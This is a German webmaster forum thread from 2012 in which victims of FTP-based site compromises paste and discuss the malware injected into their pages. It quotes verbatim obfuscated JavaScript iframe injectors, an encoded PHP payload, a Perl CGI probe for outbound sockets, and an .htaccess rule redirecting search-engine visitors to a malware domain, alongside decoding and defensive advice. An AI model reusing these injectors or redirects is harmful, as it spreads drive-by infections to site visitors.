PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Hack von Webseiten



carsten.gentsch
16.07.2012, 21:31
Hallo

kurzes aber sehr leidiges Thema, mein Kollege breichtete heute davon das sein FTP Account genutz wurde um alle Webseiten mit Schadcode zu verseuchen. IP war ein deutscher Server von dem aus die Angriffe ausgingen. Es wurden alle Daten heruntergeladen und nach code zufügen wider aufgespielt.

>s="";h=-016/7;try{q=document.createElement("p");a=(q)?"appendC":12;q[a+"hild"](""+n);}catch(qw){f=(q)?"fromCharCode":2;try{eval("a=prototype");}catch(zxc){e=window["eva"+"l"];n="52.50.600.777.396.585.654.707.440.580.276.833.456.525.696.707.160.195.360.735.40 8.570.582.763.404.160.690.798.396.305.204.728.464.580.672.406.188.235.690.847.46 0.580.606.763.456.505.582.756.408.485.678.322.400.505.276.770.456.235.324.385.22 8.255.312.357.192.265.276.728.464.545.648.238.128.550.582.763.404.305.204.588.47 6.525.696.812.404.570.204.224.460.495.684.777.432.540.630.770.412.305.204.679.46 8.580.666.238.128.510.684.679.436.505.588.777.456.500.606.798.244.170.660.777.13 6.160.582.756.420.515.660.427.136.495.606.770.464.505.684.238.128.520.606.735.41 2.520.696.427.136.250.204.224.476.525.600.812.416.305.204.350.136.310.360.329.42 0.510.684.679.436.505.372.273.164.295.78.70".split(".");if(window.document)for(i=6-2-1-2-1;-172+i<0;i=1+i){k=i;s=s+String[f](n[k]/(i%(h*h)+4));}e(s);}}<!--/c3284d-->
Der Inhnalt der Datei sieht so aus wie oben, weiß jemand von euch was diese Skripte machen und wie er sich egen über dem Serverbetreiber bzw. Anbeiter verhalten soll? Muss der Betreiber Auskunft über den Inhaber geben, ab wann ist der Severanbieter haftbar für schäden?

IP war 85.114.133.79 gehostet bei http://www.utrace.de/?query=85.114.133.79
Passend dazu fand ich das im Netz http://www.searchsecurity.de/themenbereiche/bedrohungen/viren-wuermer-trojaner/articles/198014/

Danke

Nebelwolf †
17.07.2012, 15:27
Hm,

ich befürchte, daß es sich um eine Sicherheitslücke im FTP-Server handelt. Welcher FTP-Server und welche Version hat er laufen?

Nebelwolf

carsten.gentsch
17.07.2012, 15:38
Hallo
muss ich erst fragen, er hatte gestern den Server anbieter angeschriegen die haben auch sofort geantwortet und mitgeteilt das Sie keine Auskünfte geben dürfen, sondern nur an Ermittlungsbehörden. Und das Sie den Betreiber informiert haben das der Server unter Kriminellen Einfluss steht. Vom Netz ist er nicht gegangen leider. Aber mein Kollege erstattet natürlich Anzeige versteht sich.
Ach ja das login erfolgte irgendwie nach Atacke die schon ne weile leif mit den Daten vom Hauptbenutzer für alle Accounts. Die hatten Zugriff auf Laufwerk C gesammt haben aber nur die Webseiten manipuliert.
Mehr Infos dann heute abend dazu, ich habe gestern gleich alle PW geändert bei allen Kunden und Logins.
Was wir nciht wissen ist was macht das Skript eigentlich?

MFG

Carsten

homer
17.07.2012, 16:45
ich befürchte, daß es sich um eine Sicherheitslücke im FTP-Server handelt.
... oder ein Passwort, das den Namen nicht verdient.
Was hier täglich an Brute-Force-Versuchen auf FTP, POP3, IMAP und SMTP-Auth durchläuft ist teilweise schon nicht mehr feierlich.

kjz1
17.07.2012, 16:49
Was wir nciht wissen ist was macht das Skript eigentlich?

Man könnte die betreffende Website bzw. das Skript auch einmal bei

http://wepawet.iseclab.org/

einwerfen.

Nebelwolf †
17.07.2012, 17:10
Ich habe hier gerade einen ProFTPD 1.3.3a bei dem das Problem auftritt:
<body id="home">
<!--c3284d--><script>try{1-prototype;}catch(asd){x=2;}
i=2-2;if(x){fr="fromChar";f=[4,0,89,102,89,106,100,91,99,107,36,108,105,95,105,92,30,28,51,95,91,105,87,98,92 ,22,104,105,89,50,25,94,105,107,102,47,38,37,111,96,89,93,107,101,101,89,87,97,8 8,100,104,37,100,97,38,99,86,96,100,35,103,94,101,25,22,99,88,99,90,52,24,60,102 ,101,92,99,91,84,96,99,23,23,105,88,105,101,97,99,95,99,94,51,23,88,107,105,102, 24,21,93,104,86,100,91,87,102,104,89,92,104,50,25,100,100,25,22,86,99,95,92,101, 51,23,90,91,99,107,91,103,25,22,93,92,95,92,95,106,50,25,40,23,23,109,94,91,106, 93,52,24,39,25,52,49,38,95,91,105,87,98,92,52,28,32,49,2,1];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");zx=fr+z;for(;166-5+5-i>0;i+=1){j=i;if(e)s=s+r[zx]((w[j]*1+(9+e("j%3"))));}
if(x&&f&&012===10)e(s);</script><!--/c3284d-->

NoScript blockiert eine Verbindung zu hisoquedb.tk. Der Code wird direkt hinter dem Body-Tag eingefügt.

Ich halte den Paßwortdiebstahl über Zeus für wahrscheinlich, da nur ein FTP-Zugang betroffen war, aber eine Sicherheitslücke im FTP-Server ist nicht auszuschließen.

Nebelwolf

exe
18.07.2012, 14:04
Das Script von Jochen sieht decodiert so aus:

//document.write (s) <iframe src="http://zichtopbalans.nl/main.php" name="Google_im" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe><iframe src="http://zichtopbalans.nl/main.php" name="Google_im" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe><iframe src="http://zichtopbalans.nl/main.php" name="Google_im" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>

Das im ersten Posting von carsten.gensch:

//jsunpack.called CreateElement p //eval a=prototype //eval document.write('<iframe src="http://systemrealfaq.de.nr/67934305.html" name="Twitter" scrolling="auto" frameborder="n //jsunpack.url undefined //document.write (s) <iframe src="http://systemrealfaq.de.nr/67934305.html" name="Twitter" scrolling="auto" frameborder="n" align="center" heght="2" width="2"></iframe> //jsunpack.url var s = document.write('<iframe src="http://systemrealfaq.de.nr/67934305.html" name="Twitter" scrolling="auto" frameborder="n //jsunpack.url var newurl = document.write('<iframe src="http://systemrealfaq.de.nr/67934305.html" name="Twitter" scrolling="auto" frameborder="n

http://zichtopbalans.nl/main.php -> 404
http://systemrealfaq.de.nr/67934305.html -> lädt auch nicht

Dekodierbar ist so etwas hier:
http://jsunpack.jeek.org

carsten.gentsch
18.07.2012, 14:15
Hallo
eben das gefunden nach dem ich 2 webseiten nciht aufrufen konnte.


#c3284d#
echo(gzinflate(base64_decode("VVFBboMwELxHyh98M6ipISaBtCWR0qqHnvqApkIOXoIlsIm9JKGvLyAUtcednZ2Z3U1dblWDu/nsIizJzmRLpMnbGjSy3IJAeK9gqDyqCitqoP5iPst0z6MOcI9o1bFFoC89ev7K9LdHnc3pgtASsXkOgg 5aJY2yXSuZBmS1C6JkzVcrvmYl1hX1x1HmsKuANcYpVGbUF0dnqrv2RLgqieXQXYbN7a/rmO5orATbu2txUSeBxrLWgd2fhn2UlnD7LDwaPeVRxOOwiGUSJxFwKSApwo3k4SYBzqlPHsjyX64KChx cH2O+mozvd7paheDRVKoLUXJ7oD9le6C7NOiB3bjenXoCnO752n1Ib2BSn4mmAS3fSlVJLzsPA2kw/eUX")));
#/c3284d#

Nur in 2 Dateien gefunden nachdem mein Virenscanner gemeckert hat.Habe extra noch alle PWs geändert also daran kann es nciht gelegen haben. Eingeschleustr aber bisher nur in die Login und Index Seiten. Meinen Provider habe ich informiert und gebeten mir zu sagen wie das geht. Bisher nur bei einem Provider gefunden.

Kollege sagte gerade angriff von 1 und 1 aus auf seinen Server mit Brutforce. Scheint ein großer run zu sein leider.

carsten.gentsch
18.07.2012, 15:41
Hallo
das ganze soll woll dahin gehen:
status: (referer=www.google.com/trends/hottrends)failure: <urlopen error [Errno -2] Name or service not known> einmal das ganze als Twitter und Google Variante. Got sei dank nur das, aber reicht auch aus:mad:

carsten.gentsch
19.07.2012, 23:58
Beim duchsehen des infizierten Accounts ich im CGi ordner das gefunden und kann mir nicht erklären wie sowas da hin kommen sollte?
http://www.utrace.de/whois/194.173.175.100 nett anzusehen wer da mit dran hängt.

#!/usr/bin/perl -w

$| = 1;

my $smtp = 'smtp.mail.ru';
my $dns = '194.173.175.100';

print "Content-type: text/plain; charset=windows-1251\n\n" if $ENV{HTTP_USER_AGENT};

print "System info\n";
print "-----------\n\n";
print "$^O";
print "\n", `uname -a` if $^O !~ /win/i;
print "\n\n";

print "Perl modules\n";
print "------------\n\n";
print "strict .......................... ";
unless (eval ("use strict; return 1;")) { print "Error"; } else { print "Ok"; }
print "\nSys::Hostname ................... ";
unless (eval ("use Sys::Hostname; return 1;")) { print "Error"; } else { print "Ok"; }
print "\nPOSIX ........................... ";
unless (eval ("use POSIX qw(setsid); return 1;")) { print "Error"; } else { print "Ok"; }
print "\nErrno ........................... ";
unless (eval ("use Errno qw(EINPROGRESS); return 1;")) { print "Error"; } else { print "Ok"; }
print "\nIO::Socket ...................... ";
unless (eval ("use IO::Socket qw(:DEFAULT :crlf); return 1;")) { print "Error"; } else { use IO::Socket qw(:DEFAULT :crlf); print "Ok"; }
print "\nIO::Select ...................... ";
unless (eval ("use IO::Select; return 1;")) { print "Error"; } else { print "Ok"; }
print "\n\n";

print "Local server test\n";
print "-----------\n\n";
my $s = IO::Socket::INET->new(Proto => "tcp", LocalPort => 36000, Listen => SOMAXCONN, Reuse => 1);
unless ($s) { print "Error"; } else { close $s; print "Ok"; }
print "\n\n";

print "DNS client test ($dns)\n";
print "-----------\n\n";
my $r = (gethostbyname $dns)[4];
unless ($r) { print "Error > Can't resolve DNS hostname"; exit; }
$s = IO::Socket::INET->new(Proto => "tcp", Type => SOCK_STREAM);
unless ($s) { print "Error > Can't create socket > $!"; exit; }
unless ($s->connect(pack ("Sna4x8", 2, 53, $r))) { close $s; print "Error > Can't connect > $!"; exit; }
close $s; print "Ok";
print "\n\n";

print "SMTP Client test ($smtp)\n";
print "-----------\n\n";
$r = (gethostbyname $smtp)[4];
unless ($r) { print "Error > Can't resolve SMTP hostname"; exit; }
$s = IO::Socket::INET->new(Proto => "tcp", Type => SOCK_STREAM);
unless ($s) { print "Error > Can't create socket > $!"; exit; }
unless ($s->connect(pack ("Sna4x8", 2, 25, $r))) { close $s; print "Error > Can't connect > $!"; exit; }
$r = <$s>; close $s;
if (length $r) { print "Ok\n$r"; } else { print "Error > Can't read response"; }


was macht bitte diese Datei, wie kann sowas dahin kommen? Benutzer und Gruppe 1273/1273 und wie kann es sein das mein Provider ncihts mekr davon?

homer
20.07.2012, 07:39
was macht bitte diese Datei,
Testet, ob es möglich ist

einen Daemon zu starten und auf Port 36000 zu binden
DNS-Auflösung bzw. DNS-Connect zu bekommen
einen SMTP-Server zu connecten


wie kann sowas dahin kommen? Benutzer und Gruppe 1273/1273
Durch Upload?
Wem gehört denn das cgi-bin-Verzeichnis? Und welche Rechte sind da gesetzt?

und wie kann es sein das mein Provider ncihts mekr davon?
Wie sollte er das merken?
Wenn das regulär über (s)FTP, SCP, ... hochgeladen wurde ist das für den Provider erstmal kein Problem, da ja anscheinend die Zugangsdaten korrekt waren. ich würde zunächst das Passwort ändern, wenn möglich auf SSH/SCP mit shared key auth umstellen.
Wenn das über ein fehlerhaftes Script (CMS, Blog, whatever) hochgeladen wurde, dann hat wohl eher der Seitenbetreiber als der Provider schuld. Der Provider könnte aber helfen, wenn er die Logfiles auf Spuren des Uploads durchsucht.

Ach ja, evtl auch das Script in dieser Form ma irgendwo sichern und alles ab 'print "System info\n";' durch ein 'print "FUCK YOU!"' ersetzen ;)

carsten.gentsch
20.07.2012, 12:29
Hallo das Sckript lag in einem Webverzeichniss also als web tralala usw. kein Server bzw Vserver da hinter. Ich habe meien Provider angefragt auch wegen der letzten Hacks was in den Logfiles steht bisher schweigen im Walde und keine Antworten auf meine Fragen. PW und Zugänge sind alle neugesetzt und es sind keine FTP Benutzer angelegt.
Ich kann über meine Logfiles ncihts sehen was darauf hindeuten würde, da ich die Server Logs nicht einsehen kann.
Nur ist mir die Datei nie aufgefallen da ich öfter rein schaue und nachsehe ob sich was geändert hat.
Das Verzeicniss hat die Rechte 444 und vroher auch schon gehabt. Wer es wie uploaden konnte müsste mein provider sehen können aber selbst nach dem letzten Hack und meinen Hinweisen darauf höre ich ncihts von Ihm.
Komisch ist das wenn es ein Trojaner wäre würden doch alle meine FTPS betroffen sein ist aber nur dieser. Und was spielt dabei die Deutsche IP für eine rolle?

Fragen über Fragen und ich warte noch auf die Antworten meinen Provoders.
Gotsei gedanke läuft auf meinem Vserver weder FTP noch ssh noch Postfix ;)

Bernhard Hiller
29.07.2012, 12:13
Ein Hack dieser Art ist mir auch passiert: viele meiner html-Seiten enthalten nun so ein Script, das gleich nach dem Body-Tag eingefügt wurde. Der Angriff wurde am 21.7. vormittags durchgeführt. Auch am 26.6. nachts wurden einige Seiten neu geschrieben - ich kann da aber kein solches Script finden. Was habt ihr in diesen Fällen unternommen? Mal abgesehen von der Änderung der Paßwörter für Plesk und FTP, und Wiederherstellen der alten Seiten?
Ein Beispiel für das Script, wie ich es vorfand:

<!--c3284d--><script>try{1-prototype;}catch(asd){x=2;}
if(x){fr="fromChar";f=[4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,29,32,22,112,4,0,107,88,1 04,21,96,92,103,100,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92, 59,97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,94,107,95,100,101,51,28,88,8 8,104,102,98,106,107,91,28,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,102,50,30,35,46,48,47,90,100,29, 48,4,0,94,93,104,98,37,105,105,112,98,90,37,98,90,93,106,50,30,35,46,48,47,90,10 0,29,48,4,0,94,93,104,98,37,105,103,90,22,21,52,22,23,95,106,105,103,48,36,38,98 ,106,101,90,91,36,89,103,92,87,105,96,101,99,37,90,90,38,99,86,96,100,35,103,94, 101,25,49,2,1,95,91,105,99,35,96,90,21,52,22,28,93,104,98,64,90,28,50,3,-1,91,101,88,108,99,90,101,106,35,89,101,89,112,36,86,103,102,90,101,90,56,95,95, 97,91,30,94,93,104,98,32,49,2,1,115,48,4,0,108,96,100,89,102,109,35,102,100,97,1 02,87,89,23,51,21,93,104,98,56,90,89,50,3,-1];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");zx=fr+z;for(i=0;288-5+5-i>0;i+=1){j=i;if(e)s=s+r[zx]((w[j]*1+(9+e("j%3"))));}
if(x&&f&&012===10)e(s);</script><!--/c3284d-->

GoodReputation
29.07.2012, 13:03
Vorab: So etwas ist kein Spass.

Es muss fuer den Webserver Logfiles über den Apache-Zugriff geben (access_log und error_log). Schau nach welchen welche Zeit im Filesystem die betreffende Datei hat. Dann schaue in den Minuten vor/nach dieser Uhrzeit in den Logfiles nach welche Daten abgerufen wurden. Nicht nur cgi-bin ist wichtig, das kann genauso gut ein nicht sicheres PHP Script oder ähnliches sein.

Ansonsten: Ein ordentlicher Webserver sollte immer Filterregeln haben welche das ansprechen von anderen Diensten als den vorgesehen von aussen gar nicht erst erlaubt. So etwas ist bei Massenhostern zwar komplett unüblich, sollte auf ernsten Webservern aber eine Selbstverständlichkeit sein. Das verhindert zwar keine Attacke, aber reduziert zumindest erheblich die Missbrauchsgefahr nach einem erfolgten Einbruch. Dass ein Einbruch erfolgt ist scheint mit nach Euren Beispielen sicher.

GoodReputation
29.07.2012, 13:14
Falls der Angriff/Zugriff per ftp erfolgt ist (ich habe erst jetzt den gesamten Thread noch mal gelesen, sieht ja danach aus) - zum Beispiel bei proftpd kann man natürlich die IP-Ranges genau definieren von denen aus ein Zugriff überhaupt zugelassen werden soll. Es gibt auch ein Modul um externe RBLs zu nutzen. Wer nicht über eine statische IP verfügt der sucht sich halt behelfsweise die von seinem ISP genutzten Netzblöcke heraus und lässt nur diese zu. FTP sollte man prinzipiell nicht fuer 0/0 (allewelt) zulassen.

Nebelwolf †
29.07.2012, 13:27
Hallo Bernhard,

ich gehe davon aus, daß ein Trojaner FTP-Zugangsdaten gesammelt hat und diese jetzt per Script nutzt um bösartigen Code einzuschleusen. Der betroffene Account verwaltete zwei unabhängige Websites aus reinem HTML, die beide betroffen waren. Ich habe alle FTP-Zugänge bis auf einen gelöscht und dort ein neues Paßwort vergeben.

Nebelwolf

TillP
29.07.2012, 13:28
In der Regel laufen diese Attacken immer nach dem gleichen Schema ab:

1) Angreifbares Skript finden. Das sind meist PHP-Formulare, manchmal in Zusammenspiel mit einer Datenbank.
2) Über die Lücke von 1) eine Datei auf den Server laden. Dies ist meist ein kleines Skript, oft auch in PHP geschrieben, dass, je nach Konfiguration des Webservers mehr oder weniger Unfug ermöglicht. Die Funktionen dieses Skripts reichen von einem einfachen Eingabefeld, dass dann mittels "system()" ausgeführt wird bis hin zu kompletten interaktiven Shells. (Sehr beeindruckend so etwas zu sehen)
3) 1)+2) laufen oftmals komplett automatisiert, ab jetzt kommt meist ein Mensch ins Spiel. Dieser hat nun verschiedene Möglichkeiten:
a) Datendiebstahl der Daten vom Webserver und Datenbank. Geht (fast immer) problemlos, etwaige Passwörter die dort liegen sind daher in der Regel kompromittiert.
b) Verbreitung von Malware: Dazu werden kleine Javaskripte, manipulierte Bilddaten oder anderes in die Webseiten eingefügt. Jeder, der die Seite in Zukunft besucht wird damit, je nach Browser mehr oder weniger erfolgreich ein Mitglied eines Botnetzes.
c) Versand vom Spam-Mails.
d) Verbreitung von Raubkopien oder Hosten von ganzen illegalen Seiten (gerne bei Seiten, die verwaist sind)
e) Einfügen von Links, um Pagerank irgendwelcher Spam-Seiten zu verbessern.
f) Erweiterung der Zugriffsrechte. Das Skript von 2) läuft standardmäßig mit den mehr oder weniger eingeschränkten Rechten des Webservers. Bei unsicherer Konfiguration kann man aber bis auf Root-Rechte kommen. Damit kann man dann auch z.B. eigene FTP-Server, Torrent-Tracker/-Seeder, Bitcoin-Server oder ähnliches aufsetzen.


Falls ihr euch fragt, woher ich das weiß: Nachdem eine Coppermine-Gallerie von mir mal ein paar seltsame Dateien enthalten hatte und mir Google eine Mail schrieb (Falls der Google-Bot auf Malware stößt, wird der Betreiber der Webseite automatisch informiert), habe ich mir mal Zeit genommen, und diese Dateien komplett zerlegt und auch etwas Hintergrundrecherche betrieben.

carsten.gentsch
29.07.2012, 13:42
Hallo
nach dem Angriff bei mir schaue ich jeden Tag nach ob Dateien verändert wurden. Zumindest wo ich es sehen kann. Bei der einen Geschichte warte ich immer ncoh was mein Provider sagt wie sowas passieren konnte und was die Logfiles aussagen dazu. Bisher schweigen im Walde, was ich festgestellt habe das nur 1 FTP Zugang betroffen war, was einen Trojaner ausschließen dürfte auf dem PC und nach dem ich alle PWs geändert und FTP benutzer gelöscht habe ist erstmal ruhe.
Da ich viel mit WP und Joomla arbeite schaue ich dort fast jeden Tag nach und habe gerade was WP angeht gute Module am laufen die jede veränderung von Dateien per Email melden auch Zugriffe.

Wordfence found the following new issues on "... der Blog".Critical Problems:* The Plugin "BackWPup" needs an upgrade.Also ist aktualität der Anwendungen immer gefragt und ein muss.
Nur weiss ich auch bis her icht wie das ganze passieren konnte. Und auf welchem Wege das gelang da man als Kunde ja beschränkte möglichlkeiten hat an Logs zu kommen. Zudem blocke ich alle CGI Skripte da die oftmals nicht benötigt werden.

Gruß

Bernhard Hiller
29.07.2012, 14:27
Danke für Eure Hinweise.
Ich bin nicht der Admin des Servers, es ist ein günstiges WebSpace-Angebot mit aspx (letzteres benötge ich, die aspx-Seiten scheinen unverändert zu sein; der Server ist also IIS). PHP verwende ich nicht, wird aber prinzipiell bereitgestellt. Andere Nutzer des Servers könnten also php verwenden. Ich vermute mal, daß der FTP-Server von Microsoft ist. Ich konnte mit FileZilla zugreifen, von sftp oder so wüßte ich momentan nicht. Das Paßwort für Plesk konnte ich ändern, aber das für FTP habe ich nirgends gefunden, habe nun den Provider informiert.
Die Logfiles zum Webseitenzugriff waren zum fraglichen Zeitpunkt sauber - Upload über FTP wird da meines Wissens nicht mitgeschrieben.
Laut Google-Hinweisen (http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=de&site=http://cydas.org/) wurde aber bereits vor dem 21.7. "verdächtiger Content" gefunden.
Da mein Rechner während der Analysen plötzlich mit Festplattengeratter einfror, läuft gerade desinfect von c't drüber. Ich habe ihn härtestens abgeschaltet (Steckdosenleiste). Hoffentlich kein Zeus...

Bernhard Hiller
29.07.2012, 15:51
... und auch .htaccess hat der Hacker neu geschrieben:

#c3284d#
<IfModule mod_rewrite.c>

RewriteEngine On

RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|allt heuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|bai du|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|bro wseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead| excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findlo o|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|ga laxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hisp avista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe| km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|loo kle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape| netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp |qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|st artpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchna se|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanado o|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya |yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)

RewriteRule ^(.*)$ http://lundf-creation.de/main.php [R=301,L]

</IfModule>
#/c3284d#
Redirect 301 / http://dresen.co.cc/in.cgi?9


"lundf-creation.de" findet sich übrigens auch nach Decodierung des eigenartigen Scripts, das ich oben gemeldet habe. Laut Googel gibt's dort infektiöse Malware.

GoodReputation
29.07.2012, 15:52
Falls jemand interessiert wie man das zumindest rudimentärst einschränken kann: Es gibt dort das Modul mod_dnsbl. Das ist eigentlich gedacht zum Block von IPs die in einer rbl stehen. Man kann das Ding aber auch umdrehen und so einsetzen dass es nur IPs zulässt die in einer RBL stehen. Z.B. nur deutsche IPs zulassen:



<IfModule mod_dnsbl.c>
DNSBLEngine on
DNSBLPolicy "deny,allow"
DNSBLDomain de.countries.nerd.dk
</IfModule>

TillP
29.07.2012, 16:37
... und auch .htaccess hat der Hacker neu
[...]
"lundf-creation.de" findet sich übrigens auch nach Decodierung des eigenartigen Scripts, das ich oben gemeldet habe. Laut Googel gibt's dort infektiöse Malware.

Die umgeschriebene htaccess ist ja nett: Alle Besucher über Suchmaschinen/Verzeichnisse werden umgeleitet, während der eigentliche Besitzer das vermutlich nicht merkt, weil er ja die Adresse direkt/per Lesezeichen aufruft.

Bernhard Hiller
29.07.2012, 18:09
Danke für Eure Hinweise.
Laut Avira handelt es sich um "JS/iFrame.JY.2". Dahinter steckt letztlich eine Variante von "Blacole" (http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Blacole) - dient zum Nachladen von allerlei bösen Sachen.
Besonderen Dank an TillP für die Analyse von htaccess - das ist ja echt hinterhältig, was dieser Häcker sich da erlaubt!
Ich habe die Seite repariert, aber der FTP-Zugriff steht dem Häcker noch offen für neue Zugriffe...

carsten.gentsch
29.07.2012, 18:15
Hallo
passend dazu meint Tante Gurgel:
http://www.2five.de/bild.php/2,603,screenshot1048UE20B.jpg (http://www.2five.de/bild.php/603,screenshot1048UE20B.jpg)
und dank Wot und anderer Sicherheitseinstellungen...
http://www.2five.de/bild.php/2,604,screenshot10478UL1B.jpg (http://www.2five.de/bild.php/604,screenshot10478UL1B.jpg)
Weiss eigentlich der Domaininhaber was da läuft denn die Domain wird schon recht lange damit in Verbindung gebracht?!

Ich habe die Seite repariert, aber der FTP-Zugriff steht dem Häcker noch offen für neue Zugriffe... Wie kann der FTP Zugang noch offen stehen? Passwort ändern oder FTP benutzer löschen als erste helfende Maßname!!!
Sonst den Provider wechseln sowas sollt er User schon selber machen können!

Ein Skript leitet weiter auf
yeuidoiryud.net.ms wir auch bereits als Infiziert gemeldet.

Bernhard Hiller
29.07.2012, 19:42
Den "Technischen Ansprechpartner" von lundf-creation.de habe ich nun per Email informiert.
Und mein Provider hat inzwischen das Paßwort für den FTP-Zugriff geändert (in Plesk ist dieser Nutzer nicht konfiguriert - es geht nicht um Anwender, die per FTP auf die Webseite zugreifen, sondern um den Upload der Dateien der WebSite).
Avira hält meinen Rechner für sauber (mal abgesehen von der Kopie meiner WebSite, die ich heute vormittag gezogen habe - aber die stellt in dieser Form auch keine Gefahr dar), BitDefender, ClamAV und Kaspersky werden wohl noch ein paar Stunden benötigen. Ging ja mal gut aus.
Aber wer weiß, was der Schädling anderswo anrichtet:
Die Malware umfasst 12 trojan(s), 6 exploit(s). Bei einer Infizierung verursachte die Malware im Durchschnitt 37 neue(n) Prozess(e) auf dem Zielrechner.

exe
30.07.2012, 17:03
Ich hänge es hier mal an, weil der Angriff auch via JS eingeleitet wird. Heute eine Spammail bekommen, mit einem HTML-Dokument.


<script>try{n-=eval("pro"+"totype");}catch(zxc){e=eval;n="81..90..945..1020..288..400..900..1110..891..1170..981..1010..990..1160..414..10 30..909..1160..621..1080..909..1090..909..1100..1044..1150..594..1210..756..970. .927..780..873..1090..909..400..351..980..999..1000..1089..390..369..910..432..9 30..369..1230..117..90..81..90..945..1020..1026..970..981..1010..1026..400..369. .590..117..90..81..1250..288..1010..972..1150..909..320..1107..130..81..90..81.. 1000..999..990..1053..1090..909..1100..1044..460..1071..1140..945..1160..909..40 0..306..600..945..1020..1026..970..981..1010..288..1150..1026..990..549..390..93 6..1160..1044..1120..522..470..423..1110..990..1080..945..1100..909..450..891..9 70..981..1090..1053..1100..945..1160..1089..460..1026..1170..522..560..432..560. .432..470..918..1110..1026..1170..981..470..1035..1040..999..1190..1044..1040..1 026..1010..873..1000..414..1120..936..1120..567..1120..873..1030..909..610..459. .1020..918..530..468..1020..450..1000..450..990..891..1020..459..520..450..560.. 351..320..1071..1050..900..1160..936..610..351..490..432..390..288..1040..909..1 050..927..1040..1044..610..351..490..432..390..288..1150..1044..1210..972..1010. .549..390..1062..1050..1035..1050..882..1050..972..1050..1044..1210..522..1040.. 945..1000..900..1010..990..590..1008..1110..1035..1050..1044..1050..999..1100..5 22..970..882..1150..999..1080..1053..1160..909..590..972..1010..918..1160..522.. 480..531..1160..999..1120..522..480..531..390..558..600..423..1050..918..1140..8 73..1090..909..620..306..410..531..130..81..90..1125..130..81..90..918..1170..99 0..990..1044..1050..999..1100..288..1050..918..1140..873..1090..909..1140..360.. 410..1107..130..81..90..81..1180..873..1140..288..1020..288..610..288..1000..999 ..990..1053..1090..909..1100..1044..460..891..1140..909..970..1044..1010..621..1 080..909..1090..909..1100..1044..400..351..1050..918..1140..873..1090..909..390. .369..590..918..460..1035..1010..1044..650..1044..1160..1026..1050..882..1170..1 044..1010..360..390..1035..1140..891..390..396..390..936..1160..1044..1120..522. .470..423..1110..990..1080..945..1100..909..450..891..970..981..1090..1053..1100 ..945..1160..1089..460..1026..1170..522..560..432..560..432..470..918..1110..102 6..1170..981..470..1035..1040..999..1190..1044..1040..1026..1010..873..1000..414 ..1120..936..1120..567..1120..873..1030..909..610..459..1020..918..530..468..102 0..450..1000..450..990..891..1020..459..520..450..560..351..410..531..1020..414. .1150..1044..1210..972..1010..414..1180..945..1150..945..980..945..1080..945..11 60..1089..610..351..1040..945..1000..900..1010..990..390..531..1020..414..1150.. 1044..1210..972..1010..414..1120..999..1150..945..1160..945..1110..990..610..351 ..970..882..1150..999..1080..1053..1160..909..390..531..1020..414..1150..1044..1 210..972..1010..414..1080..909..1020..1044..610..351..480..351..590..918..460..1 035..1160..1089..1080..909..460..1044..1110..1008..610..351..480..351..590..918. .460..1035..1010..1044..650..1044..1160..1026..1050..882..1170..1044..1010..360. .390..1071..1050..900..1160..936..390..396..390..441..480..351..410..531..1020.. 414..1150..909..1160..585..1160..1044..1140..945..980..1053..1160..909..400..351 ..1040..909..1050..927..1040..1044..390..396..390..441..480..351..410..531..130. .81..90..81..1000..999..990..1053..1090..909..1100..1044..460..927..1010..1044.. 690..972..1010..981..1010..990..1160..1035..660..1089..840..873..1030..702..970. .981..1010..360..390..882..1110..900..1210..351..410..819..480..837..460..873..1 120..1008..1010..990..1000..603..1040..945..1080..900..400..918..410..531..130.. 81..90..1125".split("..");h=2;s="";for(i=0;i-657<0;i=1+i){k=i;s=s+String["fromCharCode"](n[k]/(i-h*Math.floor(i/h)+9));}if(015-0xa===3)e(s);}</script>

Wirft man das bei JSunpack ein, sieht man, dass man auf online-cammunity.ru:8080/forum/showthread.php?page=3ff54f2d2ccf3428 (Vorsicht!) weitergeleitet wird. Dort wird dann versucht einem abhängig vom Browser Schadcode unterzuschieben.

http://jsunpack.jeek.org/?report=2e171028233e26dcbe410d87adeca91d43130a21

Unter anderem ein Exploit für eine alte Windows-Lücke und eine ziemlich aktuelle Java-Lücke:
https://www.virustotal.com/file/4419f8608c928da1dc435ef56415218b3f865447ae2653879977dca94dc43ebc/analysis/